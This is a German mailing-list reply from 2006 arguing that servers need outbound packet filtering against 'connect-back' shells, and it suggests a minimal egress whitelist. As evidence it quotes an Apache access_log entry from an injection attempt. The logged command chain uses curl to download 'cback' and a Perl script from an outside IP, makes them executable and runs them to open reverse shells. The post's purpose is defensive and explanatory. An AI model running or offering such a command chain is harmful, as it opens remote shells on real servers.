Re: Neues Mitglied - Fragen zu Sicherheitskomponenten
On Sat, 25 Mar 2006, Wolfgang Jeltsch wrote:
> Damals erkundigte ich mich auf dieser Liste, was ich am besten machen sollte,
> und mir wurde gesagt, dass es unsinnig ist, Zugriffe auf Ports, die sowieso
> nicht offen sind, noch durch einen Filter zu verhindern.
> Und die offenen Ports will ich ja nicht blockieren. Mit anderen Worten:
> auf einem Server, der direkt mit dem Internet verbunden ist, braucht man
> keinen Paketfilter. (So habe ich das jedenfalls verstanden.)
Es wird immer wieder vergessen, daß es auch sog. "Connectback"-Shells
gibt. D.h. ein von außen erlaubter Dienst wird dazu gebracht, daß er auf
einem beliebigen anderen Port mit einer connectback-shell
zurück-connected. Und die macht dann *wirkliche* Swinigeleien.
Somit folgt, daß auch ausgehende Connections auf das unbedingt notwendige
Maß zurückgestutzt werden sollten, will man die Angriffsvektoren so klein
wie möglich halten.
Was braucht man ausgehend?
ftp Debian-Mirror
dns root/forwarder
smtp any
ident any
Alles andere sollte gesperrt sein.
Damit laufen dann auch die cback-Dinger ins Leere.
So sehen die cback-Shells dann aus, wenn sie in die access_log pippeln:
216.63.146.236 - - [06/Mar/2006:23:26:52 +0100] "2.90 8081;cd
/var/tmp;curl -o cback http:
//216.99.218.183/cback;chmod 744 cback;./cback 217.160.242.90 8081;curl -o
dc.txt http://2
16.99.218.183/dc.txt;chmod 744 dc.txt;perl dc.txt 217.160.242.90
8081`;echo '_end_';exit;/
*</name></value></param></params></methodCall>" 400 371 "-" "-"
t++
Reply to: